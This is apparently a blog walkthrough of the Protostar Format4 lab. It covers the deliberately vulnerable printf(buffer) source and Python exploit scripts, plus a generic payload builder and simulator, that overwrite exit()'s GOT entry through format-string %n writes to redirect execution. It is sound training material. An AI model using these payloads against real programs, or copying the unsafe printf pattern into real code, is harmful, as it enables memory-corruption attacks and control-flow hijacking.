Hello Guyz,
Welcome again to my blog. Today I am going to share my walkthrough of the Exploit Exercises Protostar Format4 level.
In this level, our goal is to redirect execution to the hello() function. That proves the format string vulnerability lets us control where the program jumps, the same primitive that later levels use to execute injected shellcode. There is a catch, though: vuln() never returns, because it calls exit(1) right after printf(), so overwriting the saved return address gets us nothing. As the hint suggests, we instead use the format string vulnerability to overwrite the GOT entry of exit() with the address of hello(), so that the call to exit() lands in hello().
While researching this vulnerability I found the articles below very useful, so use them as references on format string vulnerabilities.
1. OWASP
2. StackOverflow
3. PDF
Before starting the walkthrough, let's take a look at the hints and details.
Note: I want to highlight a few points.
- I'm not the creator of the Protostar war game. I am just a player.
- Here I am just providing hints and references, so if you feel stuck anywhere, take a look here.
- Understand all previous levels before starting this one.
- Do some research on assembly, C/C++ and gdb.
Source Code
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()
{
  printf("code execution redirected! you win\n");
  _exit(1);
}

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  printf(buffer);

  exit(1);
}

int main(int argc, char **argv)
{
  vuln();
}
Hint
format4 looks at one method of redirecting execution in a process.
Hints
objdump -TR is your friend
This level is at /opt/protostar/bin/format4
Exploit
#!/usr/bin/python
import struct
# Usage (on the Protostar VM): python format4.py | /opt/protostar/bin/format4
# Our input shows up as printf argument 4 (check with "aaaa%4$x"), so the two
# addresses we place at the start of the input are arguments 4 and 5.
# Goal: write 0x080484b4 (hello) into exit's GOT entry at 0x08049724, as two
# 16-bit halves, each delivered by a 4-byte %n write.
p1 = struct.pack("I", 0x08049724)   # low half of the entry, written by %4$n
p2 = struct.pack("I", 0x08049726)   # high half of the entry, written by %5$n
p2+= "%x%x"                         # burn arguments 1 and 2; they print 11 characters
# Field widths: 8 address bytes + 11 + 33953 = 33972 = 0x84b4 at the first %n,
# then + 33616 = 67588 = 0x10804 at the second, leaving b4 84 04 08 in the GOT
# entry. The second 4-byte write also spills 0x0001 into the next GOT slot;
# %hn would keep each store to two bytes.
p3 = "%33953x%4$n"
p3+= "%33616x%5$n"
print p1+p2+p3
Exploit (Alternate Way)
#!/usr/bin/python
import struct
# Usage (on the Protostar VM): python format4.py | /opt/protostar/bin/format4
# =================================================
# Format4 [Fill in 4 Parts]
# =================================================
# [Step One] Find where our input lands among printf's arguments:
# feed "aaaa%x%x%x%x" and look for 61616161 in the output.
p1 = "aaaa"
p2 = "%x%x%x"
p3 = "%x"
#print p1+p2+p3
offset = 4   # our input is printf argument 4
# [Step Two] Confirm the offset: "aaaa%4$x" must print 61616161
# print p1+"%"+str(offset)+"$x"
# [Step Three] Put the four target addresses at the start of the input.
# objdump -TR format4 lists exit's GOT entry (R_386_JUMP_SLOT) at 08049724;
# the value we want there is hello() at 0x080484b4.
p = ''
p+= struct.pack("I", 0x08049724)   # argument 4
p+= struct.pack("I", 0x08049725)   # argument 5
p+= struct.pack("I", 0x08049726)   # argument 6
p+= struct.pack("I", 0x08049727)   # argument 7
# [Step Four] Write 0x080484b4 one byte at a time. %n stores the number of
# characters printed so far, so each width pushes the low byte of that count
# to the next byte we need:
# 16 + 164 = 180 = 0xb4, + 208 = 388 = 0x184, + 128 = 516 = 0x204, + 260 = 776 = 0x308.
# Only the low byte of each 4-byte write lands where we aim; the upper bytes
# spill into the following addresses (the last one reaches into the next GOT slot),
# which is why the writes go from the lowest address upwards.
p+= "%164x" # first padding
p+= "%4$n"
p+= "%208x" # second padding
p+= "%5$n"
p+= "%128x" # third padding
p+= "%6$n"
p+= "%260x" # fourth padding
p+= "%7$n"
print p
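As an added example (not part of the original walkthrough), the following Python 3 script generalizes the two payloads above. build_payload() computes the four field widths for any target address, value and argument offset; for exit's GOT entry, hello() and offset 4 it reproduces the 164/208/128/260 widths used above, but uses %hhn instead of %n so each store is a single byte and nothing spills into the neighbouring GOT slot. simulate_printf() emulates the parts of printf the payloads rely on (field-width %x, positional and non-positional arguments, %n/%hn/%hhn) so the arithmetic can be checked before anything is sent to the box. The words standing in for arguments 1 to 3 are constructed placeholders, and the function names are mine, not the level's.

```python
import re
import struct

# Addresses from the walkthrough: exit's GOT entry and hello() in format4.
EXIT_GOT = 0x08049724
HELLO = 0x080484b4

# The conversions the payloads rely on: %x with an optional field width and
# %n with an optional h/hh length, each with an optional N$ argument index.
SPEC = re.compile(rb"%(?:(\d+)\$)?(\d*)(hh|h)?([xn])")


def build_payload(target, value, arg_index, pad_arg=1):
    """Four single-byte writes that put `value` at target..target+3.

    arg_index: printf argument number at which our input starts (4 on format4,
    confirmed with "aaaa%4$x").  pad_arg: the argument burned by each padding
    %x; a 32-bit value prints as at most 8 hex digits and every width is kept
    at or above 8, so the width alone decides how many characters come out.
    %hhn stores one byte, so nothing spills into the neighbouring GOT slot.
    """
    payload = b"".join(struct.pack("<I", target + i) for i in range(4))
    count = len(payload)  # the 16 address bytes are printed verbatim first
    for i in range(4):
        want = (value >> (8 * i)) & 0xFF
        width = (want - count) % 256  # raise the low byte of the counter to `want`
        while width < 8:
            width += 256  # same low byte, but wide enough to dominate the %x text
        payload += b"%%%d$%dx%%%d$hhn" % (pad_arg, width, arg_index + i)
        count += width
    return payload


def simulate_printf(fmt, stack):
    """Emulate how printf counts characters for `fmt` and where each %n stores.

    `stack` lists the 32-bit words printf would take as arguments 1..N.
    Returns (characters_printed, writes) with writes as [(address, value, nbytes)].
    """
    count, writes, next_arg, pos = 0, [], 1, 0
    while pos < len(fmt):
        m = SPEC.match(fmt, pos)
        if m is None:
            count += 1  # ordinary byte, including the raw address bytes
            pos += 1
            continue
        argpos, width, length, conv = m.groups()
        if argpos:
            idx = int(argpos)
        else:
            idx = next_arg  # non-positional specs walk the arguments in order
            next_arg += 1
        arg = stack[idx - 1]
        if conv == b"x":
            count += max(int(width or 0), len(b"%x" % arg))
        else:
            nbytes = {None: 4, b"h": 2, b"hh": 1}[length]
            writes.append((arg, count & ((1 << (8 * nbytes)) - 1), nbytes))
        pos = m.end()
    return count, writes


def stack_for(payload, arg_index, below):
    """Constructed argument view: `below` holds the arg_index-1 words that sit
    before our input on the stack (3 on format4), followed by the payload read
    as little-endian words, exactly as format4 sees it at argument arg_index."""
    buf = payload + b"\0" * (-len(payload) % 4)
    return list(below) + [struct.unpack_from("<I", buf, i)[0] for i in range(0, len(buf), 4)]


def memory_after(writes, base, size):
    """Apply the recorded writes, in order, to a zeroed region at `base`."""
    mem = bytearray(size)
    for addr, value, nbytes in writes:
        for i in range(nbytes):
            off = addr + i - base
            if 0 <= off < size:
                mem[off] = (value >> (8 * i)) & 0xFF
    return bytes(mem)


if __name__ == "__main__":
    import sys
    payload = build_payload(EXIT_GOT, HELLO, arg_index=4)
    # Placeholder words for arguments 1..3 (constructed; with a fully positional
    # payload only their number matters, not their values).
    stack = stack_for(payload, 4, below=[0x200, 0xB7FD8420, 0xBFFFF614])
    printed, writes = simulate_printf(payload, stack)
    got = struct.unpack("<I", memory_after(writes, EXIT_GOT, 4))[0]
    sys.stderr.write("printed %d chars, exit@GOT would hold 0x%08x\n" % (printed, got))
    sys.stdout.buffer.write(payload + b"\n")  # raw bytes, so the output can be piped into format4
```

Run it as python3 format4_calc.py | /opt/protostar/bin/format4 (file name is hypothetical); the summary goes to stderr so only the payload reaches the target. It is Python 3, unlike the Python 2 scripts above, so generate the payload on your own host if the VM lacks Python 3. The simulator also checks the first exploit's mixed positional/non-positional payload: with arguments 1 and 2 printing as 3 and 8 hex digits, which is what its widths imply, the two %n stores leave b4 84 04 08 in the GOT entry and 0x0001 in the slot after it.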